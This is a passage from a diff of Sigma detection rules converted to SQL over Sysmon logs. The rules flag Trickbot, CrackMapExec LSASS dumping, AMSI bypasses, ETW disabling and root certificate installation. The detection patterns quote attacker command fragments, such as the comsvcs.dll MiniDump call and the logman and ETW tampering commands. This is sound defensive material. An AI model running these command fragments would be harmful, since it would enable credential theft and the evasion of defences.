LIKE '%OgA6ACgAJwBMAG8AJwArACcAYQBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATABvACcAKwAnAGEAZAAnACkA%' ESCAPE '\\' OR 
CommandLine LIKE '%6ADoAKAAnAEwAbwAnACsAJwBhAGQAJwApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMAG8AYQAnACsAJwBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATABvAGEAJwArACcAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAbwBhACcAKwAnAGQAJwApA%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regsvr32_spawn_explorer.yml" + "filename": "proc_creation_win_powershell_base64_reflection_assembly_load_obfusc.yml" }, { - "title": "Trickbot Malware Activity", - "id": "58bf96d9-ff5f-44bd-8dcc-1c4f79bf3a27", - "status": "stable", - "description": "Detects Trickbot malware process tree pattern in which \"rundll32.exe\" is a parent of \"wermgr.exe\"", - "author": "Florian Roth (Nextron Systems)", + "title": "New Root Certificate Installed Via CertMgr.EXE", + "id": "ff992eac-6449-4c60-8c1d-91c9722a1d48", + "status": "test", + "description": "Detects execution of \"certmgr\" with the \"add\" flag in order to install a new certificate on the system.\nAdversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.\n", + "author": "oscd.community, @redcanary, Zach Stanford @svch0st", "tags": [ - "attack.execution", - "attack.t1559" + "attack.defense_evasion", + "attack.t1553.004" ], "falsepositives": [ - "Unknown" + "Help Desk or IT may need to manually add a corporate Root CA on occasion. 
Need to test if GPO push doesn't trigger FP" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%DllRegisterServer%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\CertMgr.exe' ESCAPE '\\' OR OriginalFileName = 'CERTMGT.EXE') AND (CommandLine LIKE '%/add%' ESCAPE '\\' AND CommandLine LIKE '%root%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_trickbot_wermgr.yml" + "filename": "proc_creation_win_certmgr_certificate_installation.yml" }, { - "title": "Browser Started with Remote Debugging", - "id": "b3d34dc5-2efd-4ae3-845f-8ec14921f449", - "status": "experimental", - "description": "Detects browsers starting with the remote debugging flags. Which is a technique often used to perform browser injection attacks", - "author": "pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "PowerShell Get-Process LSASS", + "id": "b2815d0d-7481-4bf0-9b6c-a4c48a94b349", + "status": "test", + "description": "Detects a \"Get-Process\" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1185" + "attack.t1552.004" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '% --remote-debugging-%' ESCAPE '\\' OR (Image LIKE '%\\\\firefox.exe' ESCAPE '\\' AND CommandLine LIKE '% -start-debugger-server%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Get-Process lsas%' 
ESCAPE '\\' OR CommandLine LIKE '%ps lsas%' ESCAPE '\\' OR CommandLine LIKE '%gps lsas%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_browsers_remote_debugging.yml" + "filename": "proc_creation_win_powershell_getprocess_lsass.yml" }, { - "title": "Detection of PowerShell Execution via Sqlps.exe", - "id": "0152550d-3a26-4efd-9f0e-54a0b28ae2f3", - "status": "test", - "description": "This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server.\nScript blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.\n", - "author": "Agro (@agro_sev) oscd.community", + "title": "Renamed Msdt.EXE Execution", + "id": "bd1c6866-65fc-44b2-be51-5588fcff82b9", + "status": "experimental", + "description": "Detects the execution of a renamed \"Msdt.exe\" binary", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", "attack.defense_evasion", - "attack.t1127" + "attack.t1036.003" ], "falsepositives": [ - "Direct PS command execution through SQLPS.exe is uncommon, childprocess sqlps.exe spawned by sqlagent.exe is a legitimate action." 
+ "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\sqlps.exe' ESCAPE '\\' OR ((Image LIKE '%\\\\sqlps.exe' ESCAPE '\\' OR OriginalFileName = 'sqlps.exe') AND NOT (ParentImage LIKE '%\\\\sqlagent.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'msdt.exe' AND NOT (Image LIKE '%\\\\msdt.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mssql_sqlps_susp_execution.yml" + "filename": "proc_creation_win_renamed_msdt.yml" }, { - "title": "UNC2452 Process Creation Patterns", - "id": "9be34ad0-b6a7-4fbd-91cf-fc7ec1047f5f", - "status": "test", - "description": "Detects a specific process creation patterns as seen used by UNC2452 and provided by Microsoft as Microsoft Defender ATP queries", + "title": "HackTool - CrackMapExec Process Patterns", + "id": "f26307d8-14cd-47e3-a26b-4b4769f24af6", + "status": "experimental", + "description": "Detects suspicious process patterns found in logs when CrackMapExec is used", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%7z.exe a -v500m -mx9 -r0 -p%' ESCAPE '\\' OR (ParentCommandLine LIKE '%wscript.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%.vbs%' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Windows%' ESCAPE '\\' AND CommandLine LIKE '%.dll,Tk\\_%' ESCAPE '\\') OR (ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows%' ESCAPE '\\' AND CommandLine LIKE '%cmd.exe /C %' ESCAPE '\\') OR (CommandLine LIKE '%rundll32 c:\\\\windows\\\\%' 
ESCAPE '\\' AND CommandLine LIKE '%.dll %' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND Image LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND NOT (CommandLine IN (' ', '')))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%tasklist /fi %' ESCAPE '\\' AND CommandLine LIKE '%Imagename eq lsass.exe%' ESCAPE '\\' AND (CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (CommandLine LIKE '%do rundll32.exe C:\\\\windows\\\\System32\\\\comsvcs.dll, MiniDump%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '% full%' ESCAPE '\\' AND CommandLine LIKE '%\\%\\%B%' ESCAPE '\\') OR (CommandLine LIKE '%tasklist /v /fo csv%' ESCAPE '\\' AND CommandLine LIKE '%findstr /i \"lsass\"%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_unc2452_cmds.yml" + "filename": "proc_creation_win_hktl_crackmapexec_patterns.yml" }, { - "title": "Suspicious WmiPrvse Child Process Spawned", - "id": "8a582fe2-0882-4b89-a82a-da6b2dc32937", + "title": "Disable of ETW Trace", + "id": "a238b5d0-ce2d-4414-a676-7a531b3d13d6", "status": "test", - "description": "Detects suspicious and uncommon child processes of WmiPrvSE", - "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng", + "description": "Detects a command that clears or disables any ETW trace log which could indicate a logging evasion.", + "author": "@neu5ron, Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1047", - "attack.t1204.002", - "attack.t1218.010" + "attack.t1070", + "attack.t1562.006", + "car.2016-04-002" ], 
"falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\verclsid.exe' ESCAPE '\\') OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%cl%' ESCAPE '\\' AND CommandLine LIKE '%/Trace%' ESCAPE '\\') OR (CommandLine LIKE '%clear-log%' ESCAPE '\\' AND CommandLine LIKE '%/Trace%' ESCAPE '\\') OR (CommandLine LIKE '%sl%' ESCAPE '\\' AND CommandLine LIKE '%/e:false%' ESCAPE '\\') OR (CommandLine LIKE '%set-log%' ESCAPE '\\' AND CommandLine LIKE '%/e:false%' ESCAPE '\\') OR (CommandLine LIKE '%logman%' ESCAPE '\\' AND CommandLine LIKE '%update%' ESCAPE '\\' AND CommandLine LIKE '%trace%' ESCAPE '\\' AND CommandLine LIKE '%--p%' ESCAPE '\\' AND CommandLine LIKE '%-ets%' ESCAPE '\\') OR CommandLine LIKE '%Remove-EtwTraceProvider%' ESCAPE '\\' OR (CommandLine LIKE '%Set-EtwTraceProvider%' ESCAPE '\\' AND CommandLine LIKE '%0x11%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmiprvse_susp_child_processes.yml" + "filename": "proc_creation_win_susp_etw_trace_evasion.yml" }, { - "title": "Potential Persistence Attempt Via Existing Service Tampering", - "id": "38879043-7e1e-47a9-8d46-6bec88e201df", - "status": "test", - "description": "Detects the modification of an existing service in order to 
execute an arbitrary payload when the service is started or killed as a potential method for persistence.", - "author": "Sreeman", - "tags": [ - "attack.persistence", - "attack.t1543.003", - "attack.t1574.011" - ], + "title": "Rundll32 Execution Without DLL File", + "id": "c3a99af4-35a9-4668-879e-c09aeb4f2bdf", + "status": "experimental", + "description": "Detects the execution of rundll32 with a command line that doesn't contain a .dll file", + "author": "Tim Shelton, Florian Roth (Nextron Systems), Yassine Oukessou (fix + fp)", "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((CommandLine LIKE '%sc %' ESCAPE '\\' AND CommandLine LIKE '%config %' ESCAPE '\\' AND CommandLine LIKE '%binpath=%' ESCAPE '\\') OR (CommandLine LIKE '%sc %' ESCAPE '\\' AND CommandLine LIKE '%failure%' ESCAPE '\\' AND CommandLine LIKE '%command=%' ESCAPE '\\')) OR (((CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%FailureCommand%' ESCAPE '\\') OR (CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%ImagePath%' ESCAPE '\\')) AND (CommandLine LIKE '%.sh%' ESCAPE '\\' OR CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.bin$%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.msh$%' ESCAPE '\\' OR CommandLine LIKE '%.reg$%' ESCAPE '\\' OR CommandLine LIKE '%.scr%' ESCAPE '\\' OR CommandLine LIKE '%.ps%' ESCAPE '\\' OR CommandLine LIKE '%.vb%' ESCAPE '\\' OR CommandLine LIKE '%.jar%' ESCAPE '\\' OR CommandLine LIKE '%.pl%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR 
OriginalFileName = 'RUNDLL32.EXE') AND NOT ((CommandLine = '') OR (CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine = '') OR (CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe C:\\\\Windows\\\\system32\\\\inetcpl.cpl,ClearMyTracksByProcess%' ESCAPE '\\') OR (ParentImage LIKE '%:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' AND CommandLine LIKE '%.cpl%' ESCAPE '\\') OR (ParentImage LIKE '%:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe -Embedding%' ESCAPE '\\') OR (ParentImage LIKE '%:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\MsiExec.exe -Embedding%' ESCAPE '\\') OR (ParentImage LIKE '%:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% C:\\\\Program Files\\\\SplunkUniversalForwarder\\\\%' ESCAPE '\\') OR (CommandLine LIKE '% -localserver %' ESCAPE '\\') OR (ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe\" \"C:\\\\Program Files\\\\McAfee\\\\MSC\\\\mcmscins.dll\",DllUninstallFunction %' ESCAPE '\\' OR CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe\" /uninstall /longpath \"C:\\\\Program Files\\\\McAfee\\\\MSC\\\\mscrem.inf%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND ParentImage LIKE '%\\\\setup.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\setup.exe\" --install-archive=\"C:\\\\Users\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\' AND CommandLine LIKE '%.tmp%' ESCAPE '\\' AND CommandLine LIKE '%zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\' AND CommandLine LIKE '%Avira.OE.Setup%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sc_service_tamper_for_persistence.yml" + "filename": "proc_creation_win_rundll32_executable_invalid_extension.yml" }, { - "title": 
"ZxShell Malware", - "id": "f0b70adb-0075-43b0-9745-e82a1c608fcc", - "status": "test", - "description": "Detects a ZxShell start by the called and well-known function name", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", + "title": "Suspicious Shells Spawn by SQL Server", + "id": "869b9ca7-9ea2-4a5a-8325-e80e62f75445", + "status": "experimental", + "description": "Detects suspicious shell spawn from MSSQL process, this might be sight of RCE or SQL Injection", + "author": "FPT.EagleEye Team, wagga", "tags": [ - "attack.execution", - "attack.t1059.003", - "attack.defense_evasion", - "attack.t1218.011", - "attack.s0412", - "attack.g0001" - ], - "falsepositives": [ - "Unlikely" + "attack.t1505.003", + "attack.t1190", + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND (CommandLine LIKE '%zxFunction%' ESCAPE '\\' OR CommandLine LIKE '%RemoteDiskXXXXX%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\sqlservr.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Program Files\\\\Microsoft SQL Server\\\\%' ESCAPE '\\' AND ParentImage LIKE '%DATEV\\_DBENGINE\\\\MSSQL\\\\Binn\\\\sqlservr.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\cmd.exe\" %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_zxshell.yml" + "filename": 
"proc_creation_win_mssql_susp_child_process.yml" }, { - "title": "Windows Credential Manager Access via VaultCmd", - "id": "58f50261-c53b-4c88-bd12-1d71f12eda4c", + "title": "Potential AMSI Bypass Using NULL Bits - ProcessCreation", + "id": "92a974db-ab84-457f-9ec0-55db83d7a825", "status": "experimental", - "description": "List credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe", - "author": "frack113", + "description": "Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1555.004" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\VaultCmd.exe' ESCAPE '\\' OR OriginalFileName = 'VAULTCMD.EXE') AND CommandLine LIKE '%/listcreds:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%if(0){{{0}}}'' -f $(0 -as [char]) +%' ESCAPE '\\' OR CommandLine LIKE '%#%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_vaultcmd_list_creds.yml" + "filename": "proc_creation_win_powershell_amsi_null_bits_bypass.yml" }, { - "title": "RDP Port Forwarding Rule Added Via Netsh.EXE", - "id": "782d6f3e-4c5d-4b8c-92a3-1d05fed72e63", - "status": "test", - "description": "Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule", - "author": "Florian Roth (Nextron Systems), oscd.community", + "title": "Renamed Plink Execution", + "id": "1c12727d-02bf-45ff-a9f3-d49806a3cf43", + "status": "experimental", + "description": "Detects the execution of a renamed version of the Plink binary", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", 
"attack.defense_evasion", - "attack.command_and_control", - "attack.t1090" + "attack.t1036" ], "falsepositives": [ - "Legitimate administration activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '% i%' ESCAPE '\\' AND CommandLine LIKE '% p%' ESCAPE '\\' AND CommandLine LIKE '%=3389%' ESCAPE '\\' AND CommandLine LIKE '% c%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'Plink' OR (CommandLine LIKE '% -l forward%' ESCAPE '\\' AND CommandLine LIKE '% -P %' ESCAPE '\\' AND CommandLine LIKE '% -R %' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\plink.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_netsh_port_forwarding_3389.yml" + "filename": "proc_creation_win_renamed_plink.yml" }, { - "title": "Suspicious Microsoft Office Child Process", - "id": "438025f9-5856-4663-83f7-52f878a70a50", - "status": "test", - "description": "Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)", - "author": "Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, SCYTHE @scythe_io", + "title": "Query Usage To Exfil Data", + "id": "53ef0cef-fa24-4f25-a34a-6c72dfa2e6e2", + "status": "experimental", + "description": "Detects usage of \"query.exe\" a system binary to exfil information such as \"sessions\" and \"processes\" for later use", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1047", - "attack.t1204.002", - "attack.t1218.010" + "attack.execution" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM 
logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wordview.exe' ESCAPE '\\') AND (OriginalFileName IN ('bitsadmin.exe', 'CertOC.exe', 'CertUtil.exe', 'Cmd.Exe', 'CMSTP.EXE', 'cscript.exe', 'curl.exe', 'HH.exe', 'IEExec.exe', 'InstallUtil.exe', 'javaw.exe', 'Microsoft.Workflow.Compiler.exe', 'msdt.exe', 'MSHTA.EXE', 'msiexec.exe', 'Msxsl.exe', 'odbcconf.exe', 'pcalua.exe', 'PowerShell.EXE', 'RegAsm.exe', 'RegSvcs.exe', 'REGSVR32.exe', 'RUNDLL32.exe', 'schtasks.exe', 'ScriptRunner.exe', 'wmic.exe', 'WorkFolders.exe', 'wscript.exe') OR (Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\control.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\ieexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\installutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\javaw.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msidb.exe' ESCAPE '\\' OR 
Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR Image LIKE '%\\\\pcalua.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regasm.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\workfolders.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%:\\\\Windows\\\\System32\\\\query.exe' ESCAPE '\\' AND (CommandLine LIKE '%session >%' ESCAPE '\\' OR CommandLine LIKE '%process >%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_office_susp_child_processes.yml" + "filename": "proc_creation_win_query_session_exfil.yml" }, { - "title": "Schtasks Creation Or Modification With SYSTEM Privileges", - "id": "89ca78fd-b37c-4310-b3d3-81a023f83936", + "title": "Conhost Spawned By Uncommon Parent Process", + "id": "cbb9e3d1-2386-4e59-912e-62f1484f7a89", "status": "experimental", - "description": "Detects the creation or update of a scheduled task to run with \"NT AUTHORITY\\SYSTEM\" privileges", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects when the Console Window Host (conhost.exe) process is spawned by an uncommon parent process, which could be indicative of potential code injection activity.", + "author": "Tim Rauch", "tags": [ "attack.execution", - "attack.persistence", - "attack.t1053.005" + "attack.t1059" ], "falsepositives": 
[ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND (CommandLine LIKE '% /change %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\') AND CommandLine LIKE '%/ru %' ESCAPE '\\' AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM %' ESCAPE '\\')) AND NOT ((ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentImage LIKE '%TeamViewer\\_.exe%' ESCAPE '\\' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/TN TVInstallRestore%' ESCAPE '\\') OR ((CommandLine LIKE '%/Create /F /RU System /SC WEEKLY /TN AviraSystemSpeedupVerify /TR %' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files (x86)\\\\Avira\\\\System Speedup\\\\setup\\\\avira\\_speedup\\_setup.exe%' ESCAPE '\\' OR CommandLine LIKE '%/VERIFY /VERYSILENT /NOSTART /NODOTNET /NORESTART\" /RL HIGHEST%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\conhost.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\smss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\userinit.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ParentImage LIKE 